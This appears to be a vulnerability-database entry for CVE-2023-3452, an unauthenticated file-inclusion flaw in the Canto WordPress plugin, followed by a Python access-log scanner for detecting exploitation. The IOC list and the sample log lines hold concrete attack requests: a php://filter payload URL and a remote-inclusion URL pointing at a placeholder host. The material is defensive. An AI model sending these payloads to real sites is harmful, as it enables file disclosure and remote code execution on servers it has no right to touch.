cbcvebase.
CVE-2023-3452
published 2023-08-12

Priority: P272 · Severity: critical 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: yes
EPSS: 5.62% (92.0th percentile)
The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.

Affected (2 ranges)

Vendor         Product   Version range   Fixed in
canto          canto     <= 3.0.4        (none listed)
flightbycanto  canto     <= 3.0.4        (none listed)

Detection & IOCs (extracted from sources)

path: /wp-content/plugins/canto/includes/lib/download.php
path: /wp-content/plugins/canto/readme.txt
url: /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=php://filter/convert.base64-encode/resource=/var/www/html
filename: admin.php
path: wp-admin/admin.php
command: wp_abspath=php://filter/convert.base64-encode/resource=/var/www/html
other: PD9waHAK
other: V29yZFByZXNz
  • Detect exploitation attempts by monitoring GET requests to the vulnerable endpoint with a 'wp_abspath' parameter containing a remote URL or PHP stream wrapper (e.g., php://).
  • Flag HTTP requests to /wp-content/plugins/canto/includes/lib/download.php with a 'wp_abspath' query parameter as a strong indicator of CVE-2023-3452 exploitation.
  • Nuclei detection: check response body for both base64 strings 'PD9waHAK' and 'V29yZFByZXNz' with HTTP 200 to confirm successful LFI/RFI exploitation.
  • Unauthenticated attackers exploit the 'wp_abspath' parameter; no authentication headers or cookies are required, so any unauthenticated request to the download.php endpoint with this parameter should be alerted.
  • Monitor for outbound HTTP connections from the web server process (e.g., php-fpm, apache) to attacker-controlled hosts, which would indicate successful RFI via allow_url_include.
  • Detect version fingerprinting attempts against the Canto plugin by monitoring GET requests to /wp-content/plugins/canto/readme.txt, which precedes exploitation in the Nuclei template.
  • Remote File Inclusion (RFI) exploitation requires the PHP 'allow_url_include' directive to be enabled on the target server. If this is disabled, only Local File Inclusion (LFI) is possible.
  • Local File Inclusion is less impactful as it requires the attacker to first upload a malicious PHP file via FTP or another method into a web-readable directory.
  • The vulnerability affects Canto plugin versions up to and including 3.0.4; version detection via readme.txt is used by the Nuclei template to gate exploitation checks.
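The detection bullets above describe three signals: a fetch of the plugin's readme.txt (fingerprinting), any request to download.php carrying a 'wp_abspath' parameter, and a 'wp_abspath' value that starts with a URL scheme or PHP stream wrapper. The script below is an added example, not part of this record or of any vendor tooling: it applies those rules to web-server access-log lines in Combined Log Format and, for responses that are available, mirrors the Nuclei confirmation check on the two base64 markers (PD9waHAK decodes to "<?php\n", V29yZFByZXNz to "WordPress"). The log lines and IP addresses are constructed for the example; the parameter is decoded a second time so that double-encoded values are caught as well.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths taken from the IOC list in the record above.
VULN_PATH = "/wp-content/plugins/canto/includes/lib/download.php"
README_PATH = "/wp-content/plugins/canto/readme.txt"

# Any URL scheme or PHP stream wrapper (php://, http://, https://, ftp://, ...)
# at the start of wp_abspath is the RFI / wrapper-abuse signature.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

# Combined Log Format fields needed here: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Base64 markers the Nuclei check looks for in a 200 response body:
# "PD9waHAK" is "<?php\n", "V29yZFByZXNz" is "WordPress".
BODY_MARKERS = (b"PD9waHAK", b"V29yZFByZXNz")

# Access-log lines constructed for this example (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [12/Aug/2023:10:01:02 +0000] "GET /wp-content/plugins/canto/readme.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Aug/2023:10:01:05 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=php://filter/convert.base64-encode/resource=/var/www/html HTTP/1.1" 200 3142 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Aug/2023:10:02:11 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http%3A%2F%2F198.51.100.7%2Fx HTTP/1.1" 200 812 "-" "curl/8.0"
198.51.100.20 - - [12/Aug/2023:10:03:00 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?id=5 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.5 - - [12/Aug/2023:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def classify_request(target):
    """Classify one request target (path plus query string).

    Returns (severity, reason), or None when the request is not of interest.
    """
    parts = urlsplit(target)
    if parts.path == README_PATH:
        return ("info", "Canto readme.txt fetched (version fingerprinting)")
    if parts.path != VULN_PATH:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "wp_abspath" not in params:
        return None
    # parse_qs already URL-decodes once; a second unquote also exposes
    # double-encoded values such as php%253A%252F%252F.
    value = unquote(params["wp_abspath"][0])
    if SCHEME_RE.match(value):
        return ("critical", "wp_abspath carries a URL or stream wrapper: " + value)
    return ("high", "wp_abspath supplied to download.php: " + value)


def scan_log(text):
    """Run classify_request over access-log lines; return one finding per hit."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable CLF line
        hit = classify_request(m.group("target"))
        if hit is None:
            continue
        severity, reason = hit
        findings.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            "severity": severity,
            "reason": reason,
        })
    return findings


def response_confirms_inclusion(status, body):
    """True when a 200 response body contains both base64 markers (Nuclei's check)."""
    return status == 200 and all(marker in body for marker in BODY_MARKERS)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:<8} {f['ip']:<15} {f['status']} {f['reason']}")
```

Access logs do not carry response bodies, so `scan_log` can only rank requests; `response_confirms_inclusion` is meant for a proxy or WAF that retains bodies, and a 200 status on the download.php request alone should not be read as a successful inclusion. Egress monitoring for the web-server process, as the bullets note, is the remaining signal for a completed RFI when allow_url_include is on.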